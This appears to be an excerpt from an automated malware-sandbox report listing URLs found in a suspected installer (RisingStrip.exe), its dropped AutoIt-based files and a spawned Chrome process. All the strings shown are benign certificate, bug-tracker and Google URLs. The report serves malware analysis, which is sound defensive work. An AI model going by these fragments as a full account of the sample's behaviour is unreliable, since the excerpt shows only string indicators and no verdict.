Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: RisingStrip.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RisingStrip.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RisingStrip.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RisingStrip.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RisingStrip.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RisingStrip.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RisingStrip.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: RisingStrip.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: RisingStrip.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: RisingStrip.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: RisingStrip.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: RisingStrip.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: chrome.exe, 00000011.00000003.2120790557.000001E000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120874739.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119473142.000001E0010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121258393.000001E000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000011.00000003.2120790557.000001E000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120874739.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119473142.000001E0010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121258393.000001E000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000011.00000003.2120790557.000001E000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120874739.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119473142.000001E0010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121258393.000001E000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000011.00000003.2120790557.000001E000A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120874739.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119343056.000001E001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121366236.000001E00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119449231.000001E001060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121056766.000001E0003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119493169.000001E000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120902891.000001E000FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120039426.000001E00107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2119473142.000001E0010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121258393.000001E000F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2121193500.000001E001158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Bound.8.dr, Red.com.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Red.com, 0000000C.00000000.1680369432.00000000005F5000.00000002.00000001.01000000.00000007.sdmp, Viral.8.dr, Red.com.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: chromecache_87.19.dr	String found in binary or memory: http://www.broofa.com
Source: RisingStrip.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: RisingStrip.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: im7gdj.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000011.00000003.2133265836.000001E000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chromecache_84.19.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_84.19.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chrome.exe, 00000011.00000003.2139564446.000001E0014A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000011.00000003.2114956947.000001E0009E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2114922227.000001E00036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2113763026.000001E00036C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
